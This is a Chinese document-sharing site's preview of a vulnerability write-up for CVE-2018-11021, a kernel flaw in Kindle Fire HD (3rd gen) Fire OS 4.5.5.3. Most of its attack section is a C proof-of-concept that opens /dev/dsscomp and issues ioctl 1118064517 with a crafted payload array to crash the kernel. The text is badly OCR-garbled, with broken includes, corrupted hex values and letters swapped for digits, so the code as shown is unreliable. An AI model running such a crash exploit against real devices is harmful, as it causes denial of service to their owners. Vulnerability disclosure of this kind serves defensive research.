(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
《(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11021)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(3页珍藏版)》请在第一文库网上搜索。
1、(CVE-2018-11021)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3内核组件中的内核模块omapdriversvideoomap2dsscompdevice.c允许攻击者通过设备/dev上ioct1的参数注入特制参数/dsscomp与命令1118064517并导致内核崩溃。要探索此漏洞,必须打开设备文件/dev/dsscomp,并使用命令I118064517和精心设计的有效负载作为第三个参数在此设备文件上调用ioct1系统调用。二、漏洞影响FireOS4.5.5.3
2、三、复现过程poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevdsscompcausesthesystemcrashviaIOCT11118064517.* Re1atedbuggystructnameisdsscomp_setup_dispc_data.* ThisPocshou1drunwithpermissiontodoioct1ondevdsscomp.*/#inc1ude#inc1udettinc1ude#inc1udeconststaticchar*driver=,devdsscomp;s
3、taticcommand=1118064517;intmain(intargc,char*argv,char*env)unsignedintpay1oad=0xffffffff,0X00000003j05d200040,079900008j0x8f5928bd,0x78b02422j0X000000004Oxffffffff,0f4c50400,0x007fffff,0x8499f562,0ffff0400,0001b131dj060818210,0x00000007,0ffffffff,0x00000000,0x9da9041c0xcd980400,0x001f03f4,0X00000007
4、,0x2a34003f,0x7c80d8f3j0x63102627,0c73643a8,0xa28f0665,0X00000000,0x689e57b4,0x01ff0008,0x5e7324b1,0ae3b003f,00b174d86,0x00000400,0x2:Iffff37,0ceb367a4j0X00000040,0X00000001,0xec000f9e,0x00000001j0000001ff,0X00000000,000000000,0X0000000f,0x0425c069,0038cc3bej00000000f,000000080,0e5790100,0x5b1bffffj
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- CVE-2018-11021Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11021 Amazon rd kernel 组件 安全漏洞
链接地址:https://www.001doc.com/doc/794859.html